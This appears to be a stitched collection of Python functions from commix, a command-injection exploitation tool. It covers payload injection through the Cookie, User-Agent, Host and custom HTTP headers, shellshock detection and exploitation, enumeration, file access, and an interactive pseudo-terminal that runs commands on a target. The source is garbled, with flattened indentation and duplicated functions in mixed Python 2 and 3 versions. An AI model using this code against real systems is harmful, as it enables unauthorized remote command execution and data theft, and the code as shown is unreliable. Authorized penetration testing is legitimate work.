def inject_cookie(url, vuln_parameter, payload, proxy): if proxy == None: opener = urllib2.build_opener() else: opener = urllib2.build_opener(proxy) if settings.TIME_RELATIVE_ATTACK : payload = urllib.quote(payload) # Check if defined POST data if menu.options.data: menu.options.data = settings.USER_DEFINED_POST_DATA request = urllib2.Request(url, menu.options.data) else: url = parameters.get_url_part(url) request = urllib2.Request(url) #Check if defined extra headers. headers.do_check(request) payload = checks.newline_fixation(payload) request.add_header('Cookie', menu.options.cookie.replace(settings.INJECT_TAG, payload)) try: headers.check_http_traffic(request) response = opener.open(request) return response except ValueError: pass
def check_for_shell(url, cmd, cve, check_header, filename): try: TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) cmd = "echo " + TAG + "$(" + cmd + ")" + TAG payload = shellshock_exploitation(cve, cmd) info_msg = "Executing the '" + cmd + "' command... " if settings.VERBOSITY_LEVEL == 1: sys.stdout.write(settings.print_info_msg(info_msg)) elif settings.VERBOSITY_LEVEL > 1: sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() if settings.VERBOSITY_LEVEL >= 1: sys.stdout.write("\n" + settings.print_payload(payload)+ "\n") header = {check_header : payload} request = urllib2.Request(url, None, header) if check_header == "User-Agent": menu.options.agent = payload else: menu.options.agent = default_user_agent log_http_headers.do_check(request) log_http_headers.check_http_traffic(request) # Check if defined any HTTP Proxy. if menu.options.proxy: response = proxy.use_proxy(request) # Check if defined Tor. elif menu.options.tor: response = tor.use_tor(request) else: response = urllib2.urlopen(request) shell = response.read().rstrip().replace('\n',' ') shell = re.findall(r"" + TAG + "(.*)" + TAG, shell) shell = ''.join(shell) return shell, payload except urllib2.URLError, err_msg: print "\n" + settings.print_critical_msg(err_msg) raise SystemExit()
def inject_user_agent(url, vuln_parameter, payload, proxy): if proxy == None: opener = urllib2.build_opener() else: opener = urllib2.build_opener(proxy) # Check if defined POST data if menu.options.data: menu.options.data = settings.USER_DEFINED_POST_DATA request = urllib2.Request(url, menu.options.data) else: url = parameters.get_url_part(url) request = urllib2.Request(url) #Check if defined extra headers. headers.do_check(request) payload = checks.newline_fixation(payload) request.add_header('User-Agent', payload) try: headers.check_http_traffic(request) response = opener.open(request) return response except ValueError: pass
def inject_host(url, vuln_parameter, payload, proxy): if proxy == None: opener = urllib2.build_opener() else: opener = urllib2.build_opener(proxy) # Check if defined POST data if menu.options.data: menu.options.data = settings.USER_DEFINED_POST_DATA request = urllib2.Request(url, menu.options.data) else: url = parameters.get_url_part(url) request = urllib2.Request(url) #Check if defined extra headers. headers.do_check(request) payload = checks.newline_fixation(payload) request.add_header('Host', payload) try: headers.check_http_traffic(request) response = opener.open(request) return response except ValueError: pass
def inject_custom_header(url, vuln_parameter, payload, proxy): if proxy == None: opener = _urllib.request.build_opener() else: opener = _urllib.request.build_opener(proxy) # Check if defined POST data if menu.options.data: menu.options.data = settings.USER_DEFINED_POST_DATA request = _urllib.request.Request(url, menu.options.data.encode(settings.UNICODE_ENCODING)) else: url = parameters.get_url_part(url) request = _urllib.request.Request(url) #Check if defined extra headers. headers.do_check(request) payload = checks.newline_fixation(payload) request.add_header(settings.CUSTOM_HEADER_NAME, payload) try: headers.check_http_traffic(request) response = opener.open(request) return response except ValueError: pass
def get_request_response(request): if settings.REVERSE_TCP == False and settings.BIND_TCP == False: headers.check_http_traffic(request) # Check if defined any HTTP Proxy. if menu.options.proxy: try: response = proxy.use_proxy(request) except urllib2.HTTPError, err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \ settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None: print "" if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print "" print settings.print_critical_msg(err) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except urllib2.URLError, err_msg: if "Connection refused" in err_msg.reason: err_msg = "The target host is not responding. " err_msg += "Please ensure that is up and try again." if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \ settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None: print "" if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print "" print settings.print_critical_msg(err_msg) raise SystemExit()
def inject_custom_header(url, vuln_parameter, payload, proxy): if proxy == None: opener = urllib2.build_opener() else: opener = urllib2.build_opener(proxy) # Check if defined POST data if menu.options.data: menu.options.data = settings.USER_DEFINED_POST_DATA request = urllib2.Request(url, menu.options.data) else: url = parameters.get_url_part(url) request = urllib2.Request(url) #Check if defined extra headers. headers.do_check(request) request.add_header(settings.CUSTOM_HEADER_NAME, urllib.unquote(payload)) try: headers.check_http_traffic(request) response = opener.open(request) return response except ValueError: pass
def get_request_response(request): if settings.REVERSE_TCP == False and settings.BIND_TCP == False: headers.check_http_traffic(request) # Check if defined any HTTP Proxy. if menu.options.proxy: try: response = proxy.use_proxy(request) except urllib2.HTTPError, err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \ settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None: print "" if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print "" print settings.print_critical_msg(err) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except urllib2.URLError, err_msg: if "Connection refused" in err_msg.reason: err_msg = "The target host is not responding. " err_msg += "Please ensure that is up and try again." if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \ settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None: print "" if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print "" print settings.print_critical_msg(err_msg) raise SystemExit()
def main(): try: # Check if defined "--version" option. if menu.options.version: version.show_version() sys.exit(0) # Checkall the banner menu.banner() # Check python version number. version.python_version() # Check if defined "--dependencies" option. # For checking (non-core) third party dependenices. if menu.options.noncore_dependencies: checks.third_party_dependencies() sys.exit(0) # Check if defined "--update" option. if menu.options.update: update.updater() # Check if defined "--install" option. if menu.options.install: install.installer() sys.exit(0) # Check arguments if len(sys.argv) == 1: menu.parser.print_help() print "" sys.exit(0) # Define the level of verbosity. if menu.options.verbose > 4: err_msg = "The value for option '-v' " err_msg += "must be an integer value from range [0, 4]." print settings.print_critical_msg(err_msg) sys.exit(0) else: settings.VERBOSITY_LEVEL = menu.options.verbose # Check if defined "--delay" option. if menu.options.delay > "0": settings.DELAY = menu.options.delay # Define the level of tests to perform. if menu.options.level > 3: err_msg = "The value for option '--level' " err_msg += "must be an integer value from range [1, 3]." print settings.print_critical_msg(err_msg) sys.exit(0) # Define the local path where Metasploit Framework is installed. if menu.options.msf_path: settings.METASPLOIT_PATH = menu.options.msf_path # Parse target / data from HTTP proxy logs (i.e Burp / WebScarab). if menu.options.logfile: parser.logfile_parser() # Ignore the mathematic calculation part (Detection phase). if menu.options.skip_calc: settings.SKIP_CALC = True # Target URL reload. if menu.options.url_reload and menu.options.data: settings.URL_RELOAD = True # Check provided parameters for tests if menu.options.test_parameter: if menu.options.test_parameter.startswith("="): menu.options.test_parameter = menu.options.test_parameter[1:] settings.TEST_PARAMETER = menu.options.test_parameter.split( settings.PARAMETER_SPLITTING_REGEX) for i in range(0, len(settings.TEST_PARAMETER)): if "=" in settings.TEST_PARAMETER[i]: settings.TEST_PARAMETER[i] = settings.TEST_PARAMETER[ i].split("=")[0] # Check if ".git" exists and check for updated version! if os.path.isdir("./.git") and settings.CHECK_FOR_UPDATES_ON_START: update.check_for_update() # Check if defined character used for splitting parameter values. if menu.options.pdel: settings.PARAMETER_DELIMITER = menu.options.pdel # Check if defined character used for splitting cookie values. if menu.options.cdel: settings.COOKIE_DELIMITER = menu.options.cdel # Check if specified wrong injection technique if menu.options.tech and menu.options.tech not in settings.AVAILABLE_TECHNIQUES: found_tech = False # Convert injection technique(s) to lowercase menu.options.tech = menu.options.tech.lower() # Check if used the ',' separator if settings.PARAMETER_SPLITTING_REGEX in menu.options.tech: split_techniques_names = menu.options.tech.split( settings.PARAMETER_SPLITTING_REGEX) else: split_techniques_names = menu.options.tech.split() if split_techniques_names: for i in range(0, len(split_techniques_names)): if len(menu.options.tech) <= 4: split_first_letter = list(menu.options.tech) for j in range(0, len(split_first_letter)): if split_first_letter[ j] in settings.AVAILABLE_TECHNIQUES: found_tech = True else: found_tech = False if split_techniques_names[i].replace(' ', '') not in settings.AVAILABLE_TECHNIQUES and \ found_tech == False: err_msg = "You specified wrong value '" + split_techniques_names[ i] err_msg += "' as injection technique. " err_msg += "The value, must be a string composed by the letters (C)lassic, (E)val-based, " err_msg += "(T)ime-based, (F)ile-based (with or without commas)." print settings.print_critical_msg(err_msg) sys.exit(0) # Check if specified wrong alternative shell if menu.options.alter_shell: if menu.options.alter_shell.lower( ) not in settings.AVAILABLE_SHELLS: err_msg = "'" + menu.options.alter_shell + "' shell is not supported!" print settings.print_critical_msg(err_msg) sys.exit(0) # Check the file-destination if menu.options.file_write and not menu.options.file_dest or \ menu.options.file_upload and not menu.options.file_dest: err_msg = "Host's absolute filepath to write and/or upload, must be specified (--file-dest)." print settings.print_critical_msg(err_msg) sys.exit(0) if menu.options.file_dest and menu.options.file_write == None and menu.options.file_upload == None: err_msg = "You must enter the '--file-write' or '--file-upload' parameter." print settings.print_critical_msg(err_msg) sys.exit(0) # Check if defined "--random-agent" option. if menu.options.random_agent: menu.options.agent = random.choice(settings.USER_AGENT_LIST) # Check if defined "--url" option. if menu.options.url: url = menu.options.url # Check if http / https url = checks.check_http_s(url) # Load the crawler if menu.options.crawldepth > 0: menu.options.DEFAULT_CRAWLDEPTH_LEVEL = menu.options.crawldepth url = crawler.crawler(url) if menu.options.output_dir: output_dir = menu.options.output_dir else: output_dir = settings.OUTPUT_DIR # One directory up, if Windows or if the script is being run under "/src". if settings.IS_WINDOWS or "/src" in os.path.dirname( os.path.abspath(__file__)): os.chdir("..") output_dir = os.path.dirname(output_dir) try: os.stat(output_dir) except: os.mkdir(output_dir) # The logs filename construction. filename = logs.create_log_file(url, output_dir) try: # Check if defined POST data if menu.options.data: request = urllib2.Request(url, menu.options.data) else: request = urllib2.Request(url) headers.do_check(request) #headers.check_http_traffic(request) # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: proxy.do_check(url) # Check if defined Tor (--tor option). elif menu.options.tor: tor.do_check() if menu.options.flush_session: session_handler.flush(url) info_msg = "Checking connection to the target URL... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() if settings.VERBOSITY_LEVEL >= 2: print "" headers.check_http_traffic(request) try: # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: response = proxy.use_proxy(request) # Check if defined Tor (--tor option). elif menu.options.tor: response = tor.use_tor(request) else: try: response = urllib2.urlopen(request) except ValueError: # Invalid format for the '--headers' option. if settings.VERBOSITY_LEVEL < 2: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" err_msg = "Use '--headers=\"HEADER_NAME:HEADER_VALUE\"' " err_msg += "to provide an HTTP header or" err_msg += " '--headers=\"HEADER_NAME:" + settings.WILDCARD_CHAR + "\"' " err_msg += "if you want to try to exploit the provided HTTP header." print settings.print_critical_msg(err_msg) sys.exit(0) except urllib2.HTTPError, e: if settings.VERBOSITY_LEVEL < 2: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" err_msg = str(e).replace(": ", " (") + ")." print settings.print_critical_msg(err_msg) raise SystemExit html_data = content = response.read() if settings.VERBOSITY_LEVEL < 2: print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" # Check for CGI scripts on url checks.check_CGI_scripts(url) # Modification on payload if not menu.options.shellshock: #settings.CURRENT_USER = "******" + settings.CURRENT_USER + ")" settings.SYS_USERS = "echo $(" + settings.SYS_USERS + ")" settings.SYS_PASSES = "echo $(" + settings.SYS_PASSES + ")" # Check if defined "--file-upload" option. if menu.options.file_upload: if not re.match(settings.VALID_URL_FORMAT, menu.options.file_upload): # Check if not defined URL for upload. while True: question_msg = "Do you want to enable an HTTP server? [Y/n/q] > " sys.stdout.write( settings.print_question_msg(question_msg)) enable_HTTP_server = sys.stdin.readline().replace( "\n", "").lower() if len(enable_HTTP_server) == 0: enable_HTTP_server = "y" if enable_HTTP_server in settings.CHOICE_YES: # Check if file exists if not os.path.isfile( menu.options.file_upload): err_msg = "The '" + menu.options.file_upload + "' file, does not exists." sys.stdout.write( settings.print_critical_msg(err_msg) + "\n") sys.exit(0) http_server = "http://" + str( settings.LOCAL_HTTP_IP) + ":" + str( settings.LOCAL_HTTP_PORT) + "/" info_msg = "Setting the HTTP server on '" + http_server + "'. " print settings.print_info_msg(info_msg) menu.options.file_upload = http_server + menu.options.file_upload simple_http_server.main() break elif enable_HTTP_server in settings.CHOICE_NO: if not re.match(settings.VALID_URL_FORMAT, menu.options.file_upload): err_msg = "The '" + menu.options.file_upload + "' is not a valid URL. " print settings.print_critical_msg(err_msg) sys.exit(0) break elif enable_HTTP_server in settings.CHOICE_QUIT: sys.exit(0) else: err_msg = "'" + enable_HTTP_server + "' is not a valid answer." print settings.print_error_msg(err_msg) pass try: urllib2.urlopen(menu.options.file_upload) except urllib2.HTTPError, err_msg: print settings.print_critical_msg(err_msg) sys.exit(0) except urllib2.URLError, err_msg: print settings.print_critical_msg(err_msg) sys.exit(0)
def examine_request(request): try: headers.check_http_traffic(request) # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: return proxy.use_proxy(request) # Check if defined Tor (--tor option). elif menu.options.tor: return tor.use_tor(request) else: try: return urllib2.urlopen(request) except SocketError as e: if e.errno == errno.ECONNRESET: error_msg = "Connection reset by peer." print settings.print_critical_msg(error_msg) elif e.errno == errno.WSAECONNRESET: error_msg = "An existing connection was forcibly closed by the remote host." print settings.print_critical_msg(error_msg) raise SystemExit() except ValueError: # Invalid format for the '--header' option. if settings.VERBOSITY_LEVEL < 2: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" err_msg = "Use '--header=\"HEADER_NAME: HEADER_VALUE\"'" err_msg += "to provide an extra HTTP header or" err_msg += " '--header=\"HEADER_NAME: " + settings.WILDCARD_CHAR + "\"' " err_msg += "if you want to try to exploit the provided HTTP header." print settings.print_critical_msg(err_msg) raise SystemExit() except Exception as err_msg: if "Unauthorized" in str(err_msg): if menu.options.ignore_401: pass elif menu.options.auth_type and menu.options.auth_cred: err_msg = "The provided pair of " + menu.options.auth_type err_msg += " HTTP authentication credentials '" + menu.options.auth_cred + "'" err_msg += " seems to be invalid." print settings.print_critical_msg(err_msg) raise SystemExit() else: try: error_msg = str(err_msg.args[0]).split("] ")[1] + "." except IndexError: error_msg = str(err_msg).replace(": ", " (") + ")." print settings.print_critical_msg(error_msg) raise SystemExit() except urllib2.HTTPError, err_msg: error_description = "" if len(str(err_msg).split(": ")[1]) == 0: error_description = "Non-standard HTTP status code" err_msg = str(err_msg).replace(": ", " (") + error_description + ")." if menu.options.bulkfile: warn_msg = "Skipping URL '" + url + "' - " + err_msg print settings.print_warning_msg(warn_msg) if settings.EOF: print "" return False else: print settings.print_critical_msg(err_msg) raise SystemExit
def shellshock_handler(url, http_request_method, filename): counter = 1 vp_flag = True no_result = True export_injection_info = False injection_type = "results-based command injection" technique = "shellshock injection technique" info_msg = "Testing the " + technique + ". " if settings.VERBOSITY_LEVEL >= 2: info_msg = info_msg + "\n" sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() try: i = 0 total = len(shellshock_cves) * len(headers) for cve in shellshock_cves: for check_header in headers: # Check injection state settings.DETECTION_PHASE = True settings.EXPLOITATION_PHASE = False i = i + 1 attack_vector = "echo " + cve + ":Done;" payload = shellshock_payloads(cve, attack_vector) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL == 1: sys.stdout.write("\n" + settings.print_payload(payload)) elif settings.VERBOSITY_LEVEL >= 2: debug_msg = "Generating payload for the injection." print(settings.print_debug_msg(debug_msg)) print(settings.print_payload(payload)) header = {check_header : payload} request = _urllib.request.Request(url, None, header) if check_header == "User-Agent": menu.options.agent = payload else: menu.options.agent = default_user_agent log_http_headers.do_check(request) log_http_headers.check_http_traffic(request) # Check if defined any HTTP Proxy. if menu.options.proxy: response = proxy.use_proxy(request) # Check if defined Tor. elif menu.options.tor: response = tor.use_tor(request) else: response = _urllib.request.urlopen(request, timeout=settings.TIMEOUT) percent = ((i*100)/total) float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2)) if str(float_percent) == "100.0": if no_result == True: percent = settings.FAIL_STATUS else: percent = settings.info_msg no_result = False elif len(response.info()) > 0 and cve in response.info(): percent = settings.info_msg no_result = False else: percent = str(float_percent)+ "%" if settings.VERBOSITY_LEVEL == 0: info_msg = "Testing the " + technique + "." + "" + percent + "" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() if no_result == False: # Check injection state settings.DETECTION_PHASE = False settings.EXPLOITATION_PHASE = True # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) vuln_parameter = "HTTP Header" the_type = " " + vuln_parameter check_header = " " + check_header vp_flag = logs.add_parameter(vp_flag, filename, the_type, check_header, http_request_method, vuln_parameter, payload) check_header = check_header[1:] logs.update_payload(filename, counter, payload) if settings.VERBOSITY_LEVEL != 0: checks.total_of_requests() info_msg = "The (" + check_header + ") '" info_msg += url + Style.RESET_ALL + Style.BRIGHT info_msg += "' seems vulnerable via " + technique + "." if settings.VERBOSITY_LEVEL < 2: print("") print(settings.print_bold_info_msg(info_msg)) sub_content = "\"" + payload + "\"" print(settings.print_sub_content(sub_content)) # Enumeration options. if settings.ENUMERATION_DONE == True : if settings.VERBOSITY_LEVEL != 0: print("") while True: if not menu.options.batch: question_msg = "Do you want to enumerate again? [Y/n] > " enumerate_again = _input(settings.print_question_msg(question_msg)) else: enumerate_again = "" if len(enumerate_again) == 0: enumerate_again = "Y" if enumerate_again in settings.CHOICE_YES: enumeration(url, cve, check_header, filename) break elif enumerate_again in settings.CHOICE_NO: break elif enumerate_again in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + enumerate_again + "' is not a valid answer." print(settings.print_error_msg(err_msg)) pass else: enumeration(url, cve, check_header, filename) # File access options. if settings.FILE_ACCESS_DONE == True : while True: if not menu.options.batch: question_msg = "Do you want to access files again? [Y/n] > " file_access_again = _input(settings.print_question_msg(question_msg)) else: file_access_again= "" if len(file_access_again) == 0: file_access_again = "Y" if file_access_again in settings.CHOICE_YES: file_access(url, cve, check_header, filename) break elif file_access_again in settings.CHOICE_NO: break elif file_access_again in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + file_access_again + "' is not a valid answer." print(settings.print_error_msg(err_msg)) pass else: file_access(url, cve, check_header, filename) if menu.options.os_cmd: cmd = menu.options.os_cmd shell, payload = cmd_exec(url, cmd, cve, check_header, filename) print("\n") + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL raise SystemExit() else: # Pseudo-Terminal shell print("") go_back = False go_back_again = False while True: if go_back == True: break if not menu.options.batch: question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > " gotshell = _input(settings.print_question_msg(question_msg)) else: gotshell= "" if len(gotshell) == 0: gotshell= "Y" if gotshell in settings.CHOICE_YES: if not menu.options.batch: print("") print("Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)") if readline_error: checks.no_readline_module() while True: try: if not readline_error: # Tab compliter readline.set_completer(menu.tab_completer) # MacOSX tab compliter if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''): readline.parse_and_bind("bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind("tab: complete") cmd = _input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower() in settings.SHELL_OPTIONS: os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result) go_back, go_back_again = check_options(url, cmd, cve, check_header, filename, os_shell_option, http_request_method, go_back, go_back_again) if go_back: break else: shell, payload = cmd_exec(url, cmd, cve, check_header, filename) if shell != "": # Update logs with executed cmds and execution results. logs.executed_command(filename, cmd, shell) print("\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n") else: debug_msg = "Executing the '" + cmd + "' command. " if settings.VERBOSITY_LEVEL == 1: sys.stdout.write(settings.print_debug_msg(debug_msg)) sys.stdout.flush() sys.stdout.write("\n" + settings.print_payload(payload)+ "\n") elif settings.VERBOSITY_LEVEL >= 2: sys.stdout.write(settings.print_debug_msg(debug_msg)) sys.stdout.flush() sys.stdout.write("\n" + settings.print_payload(payload)+ "\n") err_msg = "The '" + cmd + "' command, does not return any output." print(settings.print_critical_msg(err_msg) + "\n") except KeyboardInterrupt: raise except SystemExit: raise except EOFError: err_msg = "Exiting, due to EOFError." print(settings.print_error_msg(err_msg)) raise except TypeError: break elif gotshell in settings.CHOICE_NO: if checks.next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + gotshell + "' is not a valid answer." print(settings.print_error_msg(err_msg)) continue break else: continue if no_result: if settings.VERBOSITY_LEVEL != 2: print("") err_msg = "All tested HTTP headers appear to be not injectable." print(settings.print_critical_msg(err_msg)) raise SystemExit() except _urllib.error.HTTPError as err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." print("\n") + settings.print_critical_msg(err) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() except _urllib.error.URLError as err_msg: err_msg = str(err_msg.reason).split(" ")[2:] err_msg = ' '.join(err_msg)+ "." if settings.VERBOSITY_LEVEL != 0 and settings.LOAD_SESSION == False: print("") print(settings.print_critical_msg(err_msg)) raise SystemExit() except _http_client.IncompleteRead as err_msg: print(settings.print_critical_msg(err_msg + ".")) raise SystemExit()
def shellshock_handler(url, http_request_method, filename): counter = 1 vp_flag = True no_result = True export_injection_info = False injection_type = "results-based command injection" technique = "shellshock injection technique" info_msg = "Testing the " + technique + "... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() try: i = 0 total = len(shellshock_cves) * len(headers) for cve in shellshock_cves: for check_header in headers: # Check injection state settings.DETECTION_PHASE = True settings.EXPLOITATION_PHASE = False i = i + 1 attack_vector = "echo " + cve + ":Done;" payload = shellshock_payloads(cve, attack_vector) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL == 1: sys.stdout.write("\n" + settings.print_payload(payload)) elif settings.VERBOSITY_LEVEL > 1: info_msg = "Generating a payload for injection..." print "\n" + settings.print_info_msg(info_msg) print settings.print_payload(payload) header = {check_header: payload} request = urllib2.Request(url, None, header) log_http_headers.check_http_traffic(request) response = urllib2.urlopen(request) percent = ((i * 100) / total) float_percent = "{0:.1f}".format( round(((i * 100) / (total * 1.0)), 2)) if str(float_percent) == "100.0": if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL no_result = False elif len(response.info()) > 0 and cve in response.info(): percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL no_result = False elif len(response.read()) > 0 and cve in response.read(): percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL no_result = False else: percent = str(float_percent) + "%" if not settings.VERBOSITY_LEVEL >= 1: info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() if no_result == False: # Check injection state settings.DETECTION_PHASE = False settings.EXPLOITATION_PHASE = True # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique( export_injection_info, filename, injection_type, technique) #if vp_flag == True: vuln_parameter = "HTTP Header" the_type = " " + vuln_parameter check_header = " " + check_header vp_flag = logs.add_parameter(vp_flag, filename, the_type, check_header, http_request_method, vuln_parameter, payload) check_header = check_header[1:] logs.update_payload(filename, counter, payload) success_msg = "The (" + check_header + ") '" success_msg += url + Style.RESET_ALL + Style.BRIGHT success_msg += "' seems vulnerable via " + technique + "." print "\n" + settings.print_success_msg(success_msg) print settings.SUB_CONTENT_SIGN + "Payload: " + "\"" + payload + "\"" + Style.RESET_ALL if not settings.VERBOSITY_LEVEL >= 1: print "" # Enumeration options. if settings.ENUMERATION_DONE == True: if settings.VERBOSITY_LEVEL >= 1: print "" while True: if not menu.options.batch: question_msg = "Do you want to enumerate again? [Y/n] > " sys.stdout.write( settings.print_question_msg(question_msg)) enumerate_again = sys.stdin.readline().replace( "\n", "").lower() else: enumerate_again = "" if len(enumerate_again) == 0: enumerate_again = "y" if enumerate_again in settings.CHOICE_YES: enumeration(url, cve, check_header, filename) break elif enumerate_again in settings.CHOICE_NO: break elif enumerate_again in settings.CHOICE_QUIT: sys.exit(0) else: err_msg = "'" + enumerate_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: enumeration(url, cve, check_header, filename) # File access options. if settings.FILE_ACCESS_DONE == True: while True: if not menu.options.batch: question_msg = "Do you want to access files again? [Y/n] > " sys.stdout.write( settings.print_question_msg(question_msg)) file_access_again = sys.stdin.readline( ).replace("\n", "").lower() else: file_access_again = "" if len(file_access_again) == 0: file_access_again = "y" if file_access_again in settings.CHOICE_YES: file_access(url, cve, check_header, filename) break elif file_access_again in settings.CHOICE_NO: break elif file_access_again in settings.CHOICE_QUIT: sys.exit(0) else: err_msg = "'" + file_access_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: file_access(url, cve, check_header, filename) if menu.options.os_cmd: cmd = menu.options.os_cmd shell, payload = cmd_exec(url, cmd, cve, check_header, filename) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL sys.exit(0) else: # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False: if settings.VERBOSITY_LEVEL >= 1: print "" if not menu.options.batch: question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > " sys.stdout.write( settings.print_question_msg(question_msg)) gotshell = sys.stdin.readline().replace( "\n", "").lower() else: gotshell = "" if len(gotshell) == 0: gotshell = "y" if gotshell in settings.CHOICE_YES: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: try: if not readline_error: # Tab compliter readline.set_completer( menu.tab_completer) # MacOSX tab compliter if getattr( readline, '__doc__', '' ) is not None and 'libedit' in getattr( readline, '__doc__', ''): readline.parse_and_bind( "bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind( "tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower( ) in settings.SHELL_OPTIONS: os_shell_option = checks.check_os_shell_options( cmd.lower(), technique, go_back, no_result) go_back, go_back_again = check_options( url, cmd, cve, check_header, filename, os_shell_option, http_request_method, go_back, go_back_again) if go_back: break else: shell, payload = cmd_exec( url, cmd, cve, check_header, filename) if shell != "": # Update logs with executed cmds and execution results. logs.executed_command( filename, cmd, shell) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" else: info_msg = "Executing the '" + cmd + "' command... " if settings.VERBOSITY_LEVEL == 1: sys.stdout.write( "\n" + settings. print_info_msg( info_msg)) elif settings.VERBOSITY_LEVEL > 1: sys.stdout.write( settings. print_info_msg( info_msg)) sys.stdout.flush() sys.stdout.write( "\n" + settings.print_payload( payload) + "\n") #print "\n" + settings.print_payload(payload) err_msg = "The '" + cmd + "' command, does not return any output." print settings.print_critical_msg( err_msg) + "\n" except KeyboardInterrupt: raise except SystemExit: raise except: print "" sys.exit(0) elif gotshell in settings.CHOICE_NO: if checks.next_attack_vector( technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOICE_QUIT: sys.exit(0) else: err_msg = "'" + gotshell + "' is not a valid answer." print settings.print_error_msg(err_msg) continue break else: continue if no_result: print "" except urllib2.HTTPError, err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." print "\n" + settings.print_critical_msg(err) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit()
